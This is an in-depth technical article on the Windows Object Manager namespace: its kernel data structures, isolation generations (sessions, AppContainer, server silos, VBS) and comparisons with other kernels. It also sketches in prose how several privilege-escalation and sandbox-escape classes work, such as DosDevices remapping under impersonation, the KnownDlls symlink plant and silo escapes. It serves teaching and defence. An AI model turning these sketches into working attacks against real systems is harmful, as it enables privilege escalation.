Windows Server 2016 shipped on October 12, 2016 [@en-wikipedia-windows-server-2016]. Microsoft needed a Linux-namespaces equivalent so that container runtimes -- Docker, containerd, and the Azure Kubernetes Service Windows-node pods that followed -- could host adjacent workloads on one kernel. The answer was Server Silo: a new OBJECT_TYPE registered alongside Job, Process, and Thread, that carries its own RootDirectory, DosDevicesDirectory, and ServerSiloGlobals. A process attached to a silo via PsAttachSiloToCurrentThread sees the silo's namespace as its root; the silo's \GLOBAL??\C: resolves to the silo's \Device\HarddiskVolume*, which is a different Device object from the host's. Job objects [@ms-job-objects] provide the cgroups-equivalent resource-accounting dimension; the Silo type builds on top.

The canonical reverse-engineering reference is Daniel Prizmant's July 2020 Unit 42 writeup, which spells out the architecture: "job objects are used in a similar way control groups (cgroups) are used in Linux, and... server silo objects were used as a replacement for namespaces support in the kernel" [@unit42-rev-eng-windows-containers].

The companion piece, Prizmant's June 2021 Siloscape [@unit42-siloscape], is the first known malware family that escapes the silo boundary: Prizmant named the malware "Siloscape (sounds like silo escape) because its primary goal is to escape the container, and in Windows this is implemented mainly by a server silo." James Forshaw's April 2021 Project Zero post Who Contains the Containers? [@p0-who-contains-containers] is the four-LPE companion disclosure. Microsoft's standing position is that Server Silo is not a security boundary; the Hyper-V Container, which adds a Hyper-V VM around the container's silo, is the security-boundary product.

4.5 Generation 6 -- the symbolic-link hardening continuum

The cross-cutting hardening generation closes the symlink subclass that recurred in Generations 1, 3, and 5. MS15-090 shipped on August 11, 2015 [@ms-ms15-090] and "corrects how Windows Object Manager handles object symbolic links created by a sandbox process, by preventing improper interaction with the registry by sandboxed applications, and by preventing improper interaction with the filesystem by sandboxed applications." The bulletin's canonical Object Manager CVE is CVE-2015-2428 [@nvd-cve-2015-2428], described verbatim as the case where the "Object Manager in Microsoft Windows... does not properly constrain impersonation levels during interaction with object symbolic links that originated in a sandboxed process." Subsequent Windows 10 builds added OBJ_DONT_REPARSE, an open-time flag that disables symbolic-link substitution for callers willing to opt in, and post-Siloscape patches in 2021 closed NtSetInformationSymbolicLink retargeting from inside a silo.

The scope document for this article originally attributed MS15-090 to CVE-2015-2528 and CVE-2015-1463. Independent NVD verification confirmed neither is correct: CVE-2015-2528 [@nvd-cve-2015-2528] is the MS15-102 Task Management EoP, and CVE-2015-1463 [@nvd-cve-2015-1463] is a ClamAV denial-of-service crash. The canonical MS15-090 OM-symlink CVE is CVE-2015-2428. Separately, CVE-2018-0824 [@nvd-cve-2018-0824] is a CWE-502 COM deserialization issue that joined the CISA KEV catalog on 2024-08-05, not a namespace-squatting CVE.

The residual subclass MS15-090 did not close was the per-session \?? DosDevices remapping path under impersonation. A low-privileged process whose token is impersonated by a SYSTEM service can plant a DefineDosDevice remapping that survives into the impersonation-time \?? view, and the SYSTEM-side activation-context resolver then opens the redirected path while running with elevated privileges. The canonical 2023 worked example is HackSys's Activation Context Hell -- DosDevices Remapping Attack under Impersonation [@hacksys-activation-context-hell], which targets the CSRSS / SxS activation-context resolver and shipped as CVE-2023-35359 [@nvd-cve-2023-35359], with the closely-related CVE-2022-22047 [@nvd-cve-2022-22047] covering the underlying CSRSS surface. The mitigation has to live inside the impersonation-aware \?? resolver in the SYSTEM caller, not at the symlink-creation gate.

Note: Every generation since Generation 1 has layered a new isolation primitive on top of the prior generation. None has rendered its predecessor obsolete. On 2026 Windows 11 25H2 all six generations coexist simultaneously: a UWP / MSIX app inside a Server Silo on a VBS-enabled host is session-partitioned, lowbox-rewritten, silo-scoped, VTL0-confined, integrity-gated, and watched by every loaded EDR's ObRegisterCallbacks filter. Each layer adds an independent enforcement point at ObpLookupObjectName time.

Six generations of isolation primitives is a tidy story, but it has glossed the most important question. What is the actual kernel data structure all six generations parameterize? What does the path-walk algorithm look like, what is the type registry, and where does the hash table live?

5. The four load-bearing primitives

If you remember one paragraph from this article, make it this one. The Object Manager namespace is built out of four kernel data structures: an OBJECT_HEADER that prefixes every named object in memory, an OBJECT_TYPE singleton that owns each type's method table, a ParseProcedure that delegates path resolution to the owning subsystem when needed, and an OBJECT_DIRECTORY hash table that maps names to objects. Every Windows security boundary you have read about is a parameter to one of these four pieces. The next eight subsections rebuild them one at a time.

flowchart TB OD["OBJECT_DIRECTORY
(37-bucket hash table)"] -->|"hash(name) % 37"| OH OH["OBJECT_HEADER
(PointerCount, HandleCount,
TypeIndex, InfoMask,
SecurityDescriptor, Body offset)"] -->|"TypeIndex XOR
ObHeaderCookie"| OT OT["OBJECT_TYPE singleton
(in nt!ObTypeIndexTable)"] -->|"TypeInfo"| TI TI["TYPE_INFO method table
(Dump, Open, Close, Delete,
ParseProcedure,
Security, QueryName, ...)"] OH -->|"Body[]"| BODY["Type-specific body
(EPROCESS, FILE_OBJECT,
SECTION_OBJECT, ...)"]

5.1 OBJECT_HEADER

Every named kernel object lives in non-paged pool. Immediately before each object's typed body sits an OBJECT_HEADER, a 0x30-byte (48-byte on x64) structure that the Object Manager owns. PointerCount and HandleCount are the two reference counts: the former tracks raw kernel-mode pointer references, the latter tracks user-mode handles. TypeIndex is a single byte that indexes into the nt!ObTypeIndexTable to find the object's type singleton; since Windows 10 1709, the byte is XOR-obfuscated against the per-boot nt!ObHeaderCookie so that simple type confusion is non-trivial.

InfoMask is a bitmap of optional sub-headers that may precede the main header: OBJECT_HEADER_NAME_INFO for named objects, OBJECT_HEADER_QUOTA_INFO for objects that charge a quota block, OBJECT_HEADER_HANDLE_INFO for objects that need per-process handle accounting. SecurityDescriptor is a tagged pointer to the object's DACL/SACL. Body[] is the offset at which the type-specific payload begins; for a process object that payload is an EPROCESS, for a file it is a FILE_OBJECT, and so on. The canonical reference is Chapter 8 of Windows Internals 7th Edition Part 1 [@microsoftpressstore-wininternals7-part1].

The per-object header (`nt!_OBJECT_HEADER`) that precedes every named kernel object in non-paged pool. Carries reference counts (`PointerCount`, `HandleCount`), a `TypeIndex` byte that points into `nt!ObTypeIndexTable` (XOR-obfuscated against `nt!ObHeaderCookie` since Windows 10 1709), an `InfoMask` describing optional sub-headers, a `SecurityDescriptor` pointer, and the offset to the typed `Body[]`.

The TypeIndex XOR-with-cookie is one of the smallest kernel hardening changes Microsoft has shipped: a single byte that prevents a poisoned OBJECT_HEADER from naming an arbitrary type after a heap-corruption primitive. The cookie is per-boot and lives in nt!ObHeaderCookie. The hardening is documented in Windows Internals 7th Edition Chapter 8 [@microsoftpressstore-wininternals7-part1] and in Geoff Chappell's reverse-engineering studies; Microsoft has not, as of 2026, published a Learn-hosted reference for the cookie itself.

5.2 OBJECT_TYPE

OBJECT_TYPE is the per-type singleton. There is exactly one OBJECT_TYPE per registered kernel type, and they live in \ObjectTypes. On Windows 11 25H2 the count sits at roughly seventy-five: Type, Directory, SymbolicLink, Token, Job, Process, Thread, Section, Key, File, Event, Mutant, Semaphore, Timer, WindowStation, Desktop, Device, Driver, IoCompletion, ALPC Port, EtwRegistration, Silo, and dozens more.

The per-type singleton (`nt!_OBJECT_TYPE`) that owns each kernel type's method table. The `TypeInfo` field carries eight procedure pointers and one offset field (WaitObjectFlagOffset): `DumpProcedure`, `OpenProcedure`, `CloseProcedure`, `DeleteProcedure`, `ParseProcedure` (the path-resolution callback), `SecurityProcedure`, `QueryNameProcedure`, `OkayToCloseProcedure`, and a `WaitObjectFlagOffset` offset for waitable types. Every `OBJECT_TYPE` instance is reachable through `\ObjectTypes`.

The TypeInfo field on each OBJECT_TYPE carries eight procedure pointers and one offset field (WaitObjectFlagOffset). The most consequential is the ParseProcedure. When ObpLookupObjectName is walking a path component-by-component, and a step lands on an object whose OBJECT_TYPE defines a ParseProcedure, the OM hands the residual path and the desired access to that procedure, which becomes the namespace authority below that point. That is how the registry's Key type, the I/O Manager's Device type, and the various WMI / Volume-Manager subsystems insert themselves into the namespace without the Object Manager having to know any of their internal structure [@en-wikipedia-object-manager].

5.3 The parse procedure

ObpLookupObjectName walks \Foo\Bar\Baz\...\Leaf left-to-right. At each component the walker does one of three things. The common case is a hash-table lookup in the current OBJECT_DIRECTORY's 37 buckets to find the child object by name. The second case is SymbolicLink substitution: if the child object's type is SymbolicLink, the walker substitutes the link target and re-enters the walk at the substitution. The third and most consequential case is parse-procedure handoff. If the child object's OBJECT_TYPE has a non-null ParseProcedure, the walker stops, hands the residual path string to that procedure, and lets it decide what to do.

The load-bearing method pointer on each `OBJECT_TYPE`'s `TypeInfo` field. When `ObpLookupObjectName` encounters an object whose type defines a `ParseProcedure`, the residual path is handed to that procedure for resolution. The two canonical parse procedures are `IopParseDevice` (for the `Device` type, which delegates further resolution to the device's owning driver via `IRP_MJ_CREATE`) and `CmpParseKey` (for the `Key` type, which walks the registry hive).

IopParseDevice is the parse procedure for the Device type. When the walker reaches \Device\HarddiskVolume1 and is asked to continue with \Users\me\file.txt, the I/O Manager builds an IRP_MJ_CREATE packet, dispatches it to the filesystem driver that owns the volume (NTFS, ReFS, ExFAT, FAT32, or one of several others), and lets that driver walk the rest of the path inside its own on-disk structures. The driver returns a FILE_OBJECT, which the Object Manager packages into a handle.

CmpParseKey is the parse procedure for the Key type. When the walker reaches \REGISTRY and is asked to continue with \MACHINE\Software\Microsoft\Windows, the Configuration Manager takes over and walks the in-memory hive structures.

The structural consequence is profound. Every named file in Windows is, technically, a leaf in the Object Manager namespace. NTFS, ReFS, ExFAT, and the registry are not separate naming systems; they are parse-procedure callbacks that hand FILE_OBJECT or KEY bodies back to the OM.

sequenceDiagram participant User as User Process participant OM as ObpLookupObjectName participant Dir as \GLOBAL?? OBJECT_DIRECTORY participant Dev as \Device\HarddiskVolume1 (Device type) participant Drv as NTFS Driver User->>OM: NtCreateFile("\??\C:\Users\me\file.txt") OM->>OM: rewrite \??\ -> \Sessions\\DosDevices\ OM->>Dir: lookup "C:" Dir-->>OM: SymbolicLink -> \Device\HarddiskVolume1 OM->>OM: substitute, re-enter walk OM->>Dev: lookup \Device\HarddiskVolume1 Dev-->>OM: type=Device, has ParseProcedure OM->>Drv: IopParseDevice with "\Users\me\file.txt" Drv->>Drv: IRP_MJ_CREATE: walk MFT, find file Drv-->>OM: FILE_OBJECT OM-->>User: HANDLE

5.4 The 37-bucket directory hash

OBJECT_DIRECTORY is a 37-bucket open-hash table. The hash function is RtlHashUnicodeString, applied to each component name. Thirty-seven was the prime Cutler picked in 1993; the constant has not changed in thirty-three years. The folk-knowledge corroboration is in Chapter 8 of Windows Internals 7th Edition Part 1 and in Forshaw's Windows Security Internals Chapter 8; Microsoft has never published a Learn-hosted spec for the constant [@nostarch-windows-security-internals].

The 37-bucket open-hash table (`nt!_OBJECT_DIRECTORY`) that lives at every interior node of the Object Manager tree. Keys are `UNICODE_STRING` component names; the hash is `RtlHashUnicodeString` modulo 37. Each bucket is a linked list of `OBJECT_DIRECTORY_ENTRY` records that point at the next-level `OBJECT_HEADER`. Reading the tree requires `Directory`-`TRAVERSE` rights on the parent.

The 37-bucket constant from 1993 has not changed in thirty-three years. On a 2026 Windows 11 25H2 box with several hundred MSIX packages each owning an \AppContainerNamedObjects\<package-sid>\ subtree, average bucket chains run several entries deep. Collision pressure on the constant is the open problem returned to in Section 9.

5.5 The lowbox redirect inside ObpLookupObjectName

This is the subsection that earns the second aha moment of the article.

When the calling thread's primary token is a lowbox token, ObpLookupObjectName consults the token's AppContainerNumber and package SID before it begins the walk. Lookups that would otherwise resolve into \BaseNamedObjects or \RPC Control are rewritten into \Sessions\<n>\AppContainerNamedObjects\<package-sid>\. The rewrite happens transparently to the user-mode Win32 caller, which still thinks it asked for \BaseNamedObjects\X.

A specialised token type produced by `NtCreateLowBoxToken` that carries a `TOKEN_APPCONTAINER_INFORMATION` block (with a package SID `S-1-15-2-...` and an `AppContainerNumber`). When a process runs under a lowbox token, `ObpLookupObjectName` rewrites every named-object lookup into the per-package directory `\Sessions\\AppContainerNamedObjects\\` before path walking begins. The user-facing brand for the lowbox-token mechanism. Every UWP / MSIX / Windows Store app runs in an AppContainer. The Windows API surface is unchanged for the app; the Object Manager rewrites every named-object name into a per-package subtree, gating cross-package coordination at the namespace layer. The Microsoft Learn page describes this as "Sandboxing the application kernel objects, the AppContainer environment prevents the application from influencing, or being influenced by, other application processes" [@ms-appcontainer-isolation].

The aha moment is structural. AppContainer is not a containment mechanism the way you might first picture it. It is a name-translation mechanism. The lowbox token tells the kernel which directory to rewrite every name into; the sandbox is, at root, a hash-table indirection inside the kernel's path-walk function. The Edge renderer process cannot name \BaseNamedObjects\GlobalEvent_Foo because the kernel rewrites that name into \Sessions\1\AppContainerNamedObjects\S-1-15-2-...\Global\GlobalEvent_Foo before lookup even begins. The "sandbox" is a hash-table redirect.

5.6 The Silo OBJECT_TYPE and silo-scoped views

Silo is itself a registered OBJECT_TYPE. Each silo instance carries a silo-scoped RootDirectory, DosDevicesDirectory, and ServerSiloGlobals (with the silo's own registry-hive root and per-silo BaseNamedObjects root). PsAttachSiloToCurrentThread switches the thread's namespace view; once attached, every Object Manager lookup runs through the silo's roots instead of the host's. Job objects, which provide the cgroups-equivalent resource-accounting substrate, are the underlying primitive the Silo type extends [@ms-job-objects]. The structural design history is in Prizmant's reverse-engineering writeup [@unit42-rev-eng-windows-containers].

A specialised `Job`-derived kernel object (`OBJECT_TYPE` Silo) introduced in Windows Server 2016 that carries silo-scoped `RootDirectory`, `DosDevicesDirectory`, and `ServerSiloGlobals` fields. A thread attached to a silo via `PsAttachSiloToCurrentThread` sees the silo's namespace as its root; the silo's `\GLOBAL??\C:` resolves to the silo's `\Device\HarddiskVolume*`, which is a different `Device` object from the host's. Server Silo is the substrate underneath Windows Server Containers and WSL1.

5.7 The Secure Kernel's parallel namespace

Inside VTL1, the Secure Kernel maintains a separate Object Manager tree with its own root, its own type registry, and its own handle-table machinery. The VTL0 NT kernel cannot enumerate this tree; the only cross-VTL traffic is the narrow ALPC interface each trustlet publishes. Ionescu's BH2015 inventory (Trustlet IDs 0 through 3 at ship, growing in subsequent releases) is the canonical primary [@ionescu-bh2015-pdf].

A user-mode process running in Isolated User Mode under the VTL1 Secure Kernel. Each trustlet is signed with both the Windows System Component Verification EKU (1.3.6.1.4.1.311.10.3.6) and the IUM EKU (1.3.6.1.4.1.311.10.3.37), runs at Signature Level 12, and is reachable from VTL0 only through narrow ALPC ports. LSAISO.EXE (Credential Guard), VMSP.EXE (virtual TPM host), and the vTPM provisioning trustlet are the inbox examples.

5.8 The handle table

The namespace is the name side; the per-process HANDLE_TABLE is the access side. Once a handle exists in a process, no name lookup happens on subsequent use; the kernel dereferences the handle through a three-level radix tree indexed by the 32-bit handle value, lands on an OBJECT_HEADER, and operates on the body. This is why ObRegisterCallbacks fires on handle creation and duplication rather than on every use, and why an inherited handle bypasses the callback entirely. The structural consequence -- that the Object Manager is the gate at name resolution but not at every operation -- comes back in Section 8.

Now you know the data structure. But what does the actual tree look like in 2026? What does \ contain on a Windows 11 25H2 box, and which security boundary lives in each top-level directory?

6. The 2026 top-level directory atlas

Open WinObj.exe as administrator on a Windows 11 25H2 machine and the root directory at \ carries roughly twenty entries. The table below catalogues the load-bearing ones. Each row names the directory, the security boundary it physically realises, and a representative exploit class that has been thrown at it. The driver kit's Object Directories reference [@ms-object-directories] is Microsoft's canonical inventory.

Top-level directory	What it contains	Which boundary it enforces	Exploit class
`\ObjectTypes`	The ~75 `OBJECT_TYPE` singletons (`Process`, `Thread`, `Section`, `Key`, `File`, `Token`, `Job`, `Silo`, etc.)	Meta -- the type registry the rest of the namespace depends on	Type confusion (mitigated by `ObHeaderCookie` since Windows 10 1709)
`\Device`	Driver-published device objects (`\Device\HarddiskVolume*`, `\Device\Tcp`, `\Device\Tpm`, `\Device\NamedPipe`, `\Device\Mailslot`, `\Device\Vmbus`, `\Device\KsecDD`, `\Device\CNG`)	The I/O Manager's surface; each driver's parse procedure consumes residual paths	Bait-and-switch on `\Device` (a low-privilege user redirects a privileged opener through a planted symbolic link)
`\Driver`, `\FileSystem`	Loaded `DRIVER_OBJECT` registries	KMCS / HVCI driver-load gate	Vulnerable signed-driver class (BYOVD)
`\GLOBAL??`	The machine-wide DosDevices view -- where `C:` and `D:` are symlinks to `\Device\HarddiskVolume*`	Cross-session drive-letter map	Symlink redirect across session boundary
`\??`	The per-session DosDevices alias, falling through to `\GLOBAL??`	Session-scoped drive-letter map	The HackSys / CVE-2023-35359 worked example: a low-privilege caller plants a `DefineDosDevice` remapping that survives into the impersonation-time `\??` view, and the SYSTEM-side activation-context resolver opens the redirected path
`\BaseNamedObjects`	The global / `Global\`-prefixed-only BNO	Cross-session named-object visibility	Pre-Vista squatting class (closed by Generation 2)
`\Sessions\<n>\`	Per-session subtrees (BNO, DosDevices, WindowStations, AppContainerNamedObjects)	Session boundary (Generation 2)	Shatter attacks (closed by Generation 2)
`\Sessions\<n>\AppContainerNamedObjects\<package-sid>\`	Per-package UWP / MSIX lowbox namespace	AppContainer / lowbox boundary (Generation 3)	Forshaw P0 Issue 1550 arbitrary-directory creation race
`\RPC Control`	Every named LRPC ALPC port (every COM call lands here)	RPC endpoint visibility	Endpoint squatting against named LRPC ports
`\KnownDlls`, `\KnownDlls32`	Pre-mapped `Section` objects for system DLLs	Loader supply-chain	`DefineDosDevice` + `\??` symlink-plant trick (closed in NTDLL July 2022, build 19044.1826)
`\KernelObjects`	System-defined events (`LowMemoryCondition`, `HighMemoryCondition`, etc.)	Kernel-internal visibility	None public
`\Callback`	System-defined `Callback` objects (`ExCallback` slots drivers register against)	Kernel API extension surface	Driver-callback abuse
`\Security`	LSA-private endpoints	LSA / authentication isolation	Credential-theft (the LSAISO trustlet via Generation 4)
`\Windows`	BNO-redirect surface and `SharedSection`	Win32 subsystem shared state	Cross-session Win32 state leakage
`\Silos\<id>`	Per-container silo subroots on Server SKUs	Server Silo boundary (Generation 5)	Siloscape -- symlink retarget out of the silo
`\BNOLINKS`	The boundary-keyed private-namespace index	`CreatePrivateNamespace` cross-session/cross-package IPC	None public; the directory itself is RE-derived

flowchart LR subgraph EdgeRenderer["Microsoft Edge Renderer (lowbox token)"] K32["CreateMutexW(L'Global\\Foo')"] end K32 -->|"NtCreateMutant, OBJECT_ATTRIBUTES"| OB subgraph KernelOb["ObpLookupObjectName"] OB["Read caller token
token.AppContainerNumber
token.PackageSid"] OB -->|"rewrite name"| RW["Rewrite '\\BaseNamedObjects\\Global\\Foo'
to
'\\Sessions\\1\\AppContainerNamedObjects\\
S-1-15-2-...\\Global\\Foo'"] RW --> WALK["walk the rewritten path"] end WALK --> Dir["\\Sessions\\1\\AppContainerNamedObjects\\
S-1-15-2-...\\Global\\
(per-package OBJECT_DIRECTORY,
DACL allows only package SID)"]

The \BNOLINKS directory deserves a separate paragraph because it is not on Microsoft Learn. NtCreatePrivateNamespace is the kernel-side syscall behind the Win32 CreatePrivateNamespace API [@ms-createprivatenamespacew]; the caller passes a boundary descriptor built by CreateBoundaryDescriptor [@ms-createboundarydescriptorw] plus one or more SIDs added via AddSIDToBoundaryDescriptor [@ms-addsidtoboundarydescriptor]. The kernel materialises one \BNOLINKS entry per (alias_prefix, boundary_descriptor_hash) tuple; two callers that pass the same lpAliasPrefix but different boundary descriptors land on different directories. The native signature is documented in the PHNT-derived NtDoc mirror [@ntdoc-ntcreateprivatenamespace], and the OBJECT_BOUNDARY_DESCRIPTOR structure layout is at ntdoc.m417z.com/object_boundary_descriptor [@ntdoc-object-boundary-descriptor]. The Win32 Object Namespaces overview [@ms-object-namespaces] is Microsoft's only published user-mode reference; the \BNOLINKS directory name itself is reverse-engineering-derived.The \BNOLINKS directory is documented only through reverse engineering of ntoskrnl.exe -- via Forshaw's NtObjectManager and System Informer's PHNT headers -- not on Microsoft Learn. The user-mode API surface (CreatePrivateNamespace, CreateBoundaryDescriptor, AddSIDToBoundaryDescriptor) is fully documented. The provenance gap is worth flagging when you cite the directory by name.The \KnownDlls LPE class was, for a decade, the canonical example of how a DACL plus loader-side validation could lock down a supply-chain anchor. Forshaw's August 2018 P0 post first sketched a DefineDosDevice + \?? symlink-plant chain that could land a forged Section object into \KnownDlls; Clement Labro (itm4n) implemented the attack as the PPLdump tool and wrote companion posts on both itm4n.github.io [@itm4n-lsass-runasppl] and the SCRT team blog [@blog-scrt-bypassing-lsa-protection-in-userland]. The class was closed in NTDLL by Windows 10 21H2 build 19044.1826; itm4n confirms the patch in The End of PPLdump [@itm4n-the-end-of-ppldump]: "A patch in NTDLL now prevents PPLs from loading Known DLLs."

{` const MAX_DIRECTORY_BUCKETS = 37;

function rtlHashUnicodeString(name) { let h = 0; for (const ch of name.toUpperCase()) { h = (h * 31 + ch.charCodeAt(0)) >>> 0; } return h % MAX_DIRECTORY_BUCKETS; }

function makeDir() { return { buckets: Array(MAX_DIRECTORY_BUCKETS).fill(null).map(() => []) }; }

function addChild(dir, name, child) { dir.buckets[rtlHashUnicodeString(name)].push({ name, child }); }

const root = makeDir(); const device = makeDir(); device.parseProcedure = true; device.type = 'Device'; const sessions = makeDir(); addChild(root, 'Device', device); addChild(root, 'Sessions', sessions); addChild(root, 'BaseNamedObjects', makeDir());

lookupObjectName('\\Device\\HarddiskVolume1\\Users\\me\\file.txt', root); `}

The walk is the algorithm. The 37 is the bucket count Cutler picked in 1993. The parse-procedure handoff is where the I/O Manager and the Configuration Manager and dozens of other subsystems insert themselves into the tree. Now turn the question around: Windows bet on one tree. What did the kernels that did not bet on one tree do, and why?

7. How other kernels name kernel objects

Three kernels, three different bets. Linux took the namespace and split it into per-resource-class clones -- one for mounts, one for PIDs, one for IPC, one for the network stack, one for users, one for hostnames, one for cgroups, one for time -- and never built a unified tree. macOS / Darwin gave each task its own Mach port-right namespace and let launchd broker named-service lookups. Plan 9 from Bell Labs was the academic ancestor of "every named OS resource is a filesystem path," and the design Cutler imported into NT.

7.1 Linux: per-resource namespaces

Linux ships eight namespace types, each governed by a CLONE_NEW* flag passed to clone(), unshare(), or setns(): mount, PID, network, IPC, user, UTS, cgroup, and time. The namespaces(7) man page is precise: "A namespace wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource" [@man7-namespaces]. Docker, containerd, runc, Kubernetes pods, LXC, and systemd-nspawn all compose these eight flags into a Linux container.

The strength of the Linux design is per-class composability. A process can be in a fresh mount namespace, a fresh PID namespace, and the host's network namespace, all at once. The weakness is the absence of a unified type registry: Linux has no equivalent of \ObjectTypes, no equivalent of the OBJECT_HEADER reference counting that the kernel applies uniformly to every named object. Each resource class has its own lookup function, its own permission model, and its own ownership story. A bug in any one of them is bounded to that one resource class but is also not shared mitigation across the others.

7.2 macOS / Darwin: Mach ports and the bootstrap server

Darwin's kernel-object naming is capability-style. Apple's archive documentation describes the model directly: "each task consists of a virtual address space, a port right namespace, and one or more threads" [@apple-mach-kernel]. Tasks send messages by holding a port right -- a per-task index into a kernel-managed table of Mach ports. There is no single hierarchical namespace; ports are sent over Mach messages, and launchd operates as the bootstrap-server name broker for services that need a stable rendezvous. A separate I/O Registry tree carries device objects.

The strength of the Mach design is that capabilities cannot be forged; you cannot synthesise a port right out of a string the way you can synthesise a path string under Windows. The weakness is the split namespace: device objects live in the I/O Registry, services live behind launchd, and the kernel itself has no equivalent of \BaseNamedObjects as a one-stop shop.

7.3 Plan 9 from Bell Labs

Plan 9 is the design lineage Cutler imported. In Plan 9, every named operating-system resource -- including processes, network connections, devices, and the window system -- surfaces as a path served over 9P. The single hierarchical namespace was the central claim. Plan 9 never reached commercial scale, but its design idea reached production in three places: NT (1993, via Cutler), Linux's /proc, /sys, and FUSE (the 1990s onward), and the various capability-OS research projects (KeyKOS, EROS, seL4) that took the lessons in a different direction.

Primitive	Granularity	Enforcement point	Structural / opt-in	Bypass by privilege	Inheritance gap
Per-Session (NT)	Logon session	`ObpLookupObjectName` + DACL	Structural	`SeDebugPrivilege` short-circuit	Inherited handles cross sessions
AppContainer Lowbox (NT)	Package SID	`ObpLookupObjectName` rewrite	Structural	TCB privileges only	Brokered handles enter
Server Silo (NT)	Container	Process->Silo indirection	Structural	KMCS-signed driver	Host handles cross silos
VBS / IUM Trustlet (NT)	Trust level (VTL)	Hypervisor	Structural	Hypervisor compromise	Cross-VTL ALPC only
Mandatory Integrity Control (NT)	IL band	`SeAccessCheckByType`	Opt-in (per-object SACL)	`SeRelabelPrivilege`	Inherited handles bypass
`ObRegisterCallbacks` (NT)	Per-type, per-driver	Object Manager pre-op callback	Mediation, not partition	KMCS-signed driver	Inheritance bypasses callback
Private Namespace (NT)	Boundary SID-list	`NtCreatePrivateNamespace`	Structural	All SIDs in caller's token	Boundary-keyed
Linux Namespace	Per-resource clone	`setns`/`unshare`/`clone`	Structural	`CAP_SYS_ADMIN`	Fork inherits namespace set
Mach Port Right	Per-task	Capability check on send	Structural (capabilities)	`host_priv` / kernel	Inherited rights on fork

The Object Manager namespace is not a filesystem. There is no disk persistence, no journal, no FAT or MFT, no inode allocator, no per-file DACL in the filesystem sense. Nothing under `\` survives a reboot. Files-on-disk, registry-keys-in-a-hive, and named pipes are leaves in the OM tree, but the actual filesystem implementation lives in NTFS / ReFS / ExFAT drivers reached through the `Device` type's parse procedure.

What the OM namespace shares with filesystems is exactly three things: the path-walk algorithm (left-to-right, component-by-component, with one hash-table lookup per component), the per-directory hash table (analogous to the directory-entry hash filesystems use), and the per-object security descriptor (which the SRM enforces at the same point a filesystem would enforce its DACL).

When you read or write the phrase "Object Manager namespace," the metaphor that is doing real work is "in-memory directory tree the kernel uses to find named objects," not "filesystem in the disk-format sense."

The Windows 2000-era `CreateRestrictedToken` primitive was the wrong layer in 2000 as a standalone sandboxing mechanism -- it could not partition the namespace; it only filtered the caller's SID set against per-object DACLs. Chromium revived it in 2008 as one of four cooperating layers, and that pattern is the canonical 2026 production sandbox shape. The Chromium design document captures the constraints: "The Windows sandbox is a user-mode only sandbox. There are no special kernel mode drivers... The sandbox is provided as a static library that must be linked to both the broker and the target executables" (Chromium Sandbox Design [@chromium-sandbox-md], FAQ [@chromium-sandbox-faq]).

The four layers compose pairwise-orthogonally. The token gates which DACLs the renderer can satisfy at SeAccessCheck time; the job object gates which kernel API surface the renderer can call (UI exceptions, process creation, etc.); the integrity level gates which writes the renderer can perform across MIC label boundaries; the AppContainer lowbox-rewrites every named-object lookup into the per-package directory inside ObpLookupObjectName. A handle that survives all four checks is the only object the renderer can usefully touch. The load-bearing header is sandbox_policy.h, which declares TargetConfig::SetTokenLevel(TokenLevel initial, TokenLevel lockdown), SetJobLevel, SetIntegrityLevel, SetDelayedIntegrityLevel, and SetAppContainerSid, with one verbatim mutual-exclusion note: "Using an initial token is not compatible with AppContainer" [@chromium-sandbox-policy-h].

This is the 2026 production sandbox shape every Chromium-based browser inherits (Edge, Chrome, Brave, Vivaldi, Opera), as do Electron-based apps like Visual Studio Code's renderer processes.

The cross-VTL ALPC ports through which a VTL0 process talks to a VTL1 trustlet are still located in VTL0's `\RPC Control`. An attacker who controls VTL0 can *send* messages to LsaIso even though they cannot *read* LsaIso's internal state. Oliver Lyak's December 2022 *Pass-the-Challenge* result is the canonical worked example ([GitHub: ly4k/PassTheChallenge](https://github.com/ly4k/PassTheChallenge)): the trustlet's pages are never read, but the trustlet's RPC output exfiltrates the secret. The lesson is that VTL1 isolation is a *page-level* read barrier, not a *protocol-level* containment property. The VBS Trustlets piece in this corpus carries the deeper walkthrough.

Windows bet on one tree; Linux bet on eight clone-flag dimensions; Darwin bet on capability-style port-right tables. Each bet has theoretical limits. What are they?

8. What the namespace cannot do

The frame for this section comes from James P. Anderson's 1972 USAF technical report Computer Security Technology Planning Study (ESD-TR-73-51), Section 4.1.1. Anderson is the named originator of the reference-monitor concept and of the four properties such a monitor must satisfy. Wikipedia preserves the modern acronym verbatim: the reference-validation mechanism must be "Non-bypassable... Evaluable... Always invoked... Tamper-proof," and "according to Ross Anderson, the reference monitor concept was introduced by James Anderson in an influential 1972 paper" [@wikipedia-reference-monitor]. The NIST CSRC mirror hosts the original PDF [@csrc-nist-ande72].

Saltzer and Schroeder's 1975 paper The Protection of Information in Computer Systems [@cs-virginia-saltzer-schroeder] added the complete-mediation principle -- "every access to every object must be checked for authority" -- and seven other design principles the reference-validation mechanism must satisfy (economy of mechanism, fail-safe defaults, open design, separation of privilege, least privilege, least common mechanism, psychological acceptability).

Map the Windows Object Manager against the four NEAT properties and the answer is uncomfortable. The namespace partially achieves two (Always-invoked and Tamper-proof), fails Non-bypassable outright, and falls one to two orders of magnitude short of Evaluable.

8.1 Always-invoked: provably gapped

The namespace achieves always-invoked for name-based opens. Every Nt*OpenObject* syscall walks ObpLookupObjectName; there is no path that returns a handle to a named object without going through the lookup. But the namespace cannot achieve always-invoked for handle inheritance. A child process inherits handles from CreateProcess(bInheritHandles=TRUE) without going through the OM at all. The handles already exist in the parent's HANDLE_TABLE; the kernel walks the parent's table, duplicates the entries into the child's table, and the child has live access. No name-lookup, no ObRegisterCallbacks callback, no SRM check. As long as the OS API exposes handle inheritance -- and it is too deeply embedded in 33 years of shipping Windows code to remove -- the Object Manager cannot be the sole reference monitor.

8.2 Tamper-proof: bounded, not absolute

The Object Manager runs in ring 0, under Kernel-Mode Code Signing (KMCS), and -- on machines with Virtualization-Based Security and Hypervisor-protected Code Integrity (HVCI) enabled -- inside a Hyper-V-enforced code-integrity policy. Any kernel-mode adversary who can load a driver bypasses the OM. KMCS and HVCI raise the cost; they do not eliminate the surface. The Bring-Your-Own-Vulnerable-Driver class of attacks (signed but exploitable drivers) is the running residual class, and the historical pattern is that one or two new vulnerable signed drivers surface every quarter.

8.3 Evaluable: provably above threshold

